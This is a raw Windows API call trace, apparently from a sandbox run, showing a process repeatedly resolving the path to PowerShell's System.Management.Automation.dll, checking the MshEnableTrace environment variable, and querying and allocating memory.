	[0324.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.703] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0324.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.703] CoTaskMemFree (pv=0x2a1100) 
	[0324.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0325.571] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0325.576] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.576] CoTaskMemFree (pv=0x2a1100) 
	[0325.579] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0325.586] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.586] CoTaskMemFree (pv=0x2a1100) 
	[0325.587] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.587] CoTaskMemFree (pv=0x2a1100) 
	[0325.588] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.588] CoTaskMemFree (pv=0x2a1100) 
	[0325.591] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.591] CoTaskMemFree (pv=0x2a1100) 
	[0325.595] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.595] CoTaskMemFree (pv=0x2a1100) 
	[0325.596] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0325.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.596] CoTaskMemFree (pv=0x2a1100) 
	[0325.600] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0325.601] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0327.460] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0327.463] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0327.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0327.463] CoTaskMemFree (pv=0x2a1100) 
	[0328.483] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2a1540
	[0328.484] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2a1650
	[0330.167] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.394] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.397] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.398] VirtualQuery (in: lpAddress=0x1ca080, lpBuffer=0x1caf40, dwLength=0x30 | out: lpBuffer=0x1caf40*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.194] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.194] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.195] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
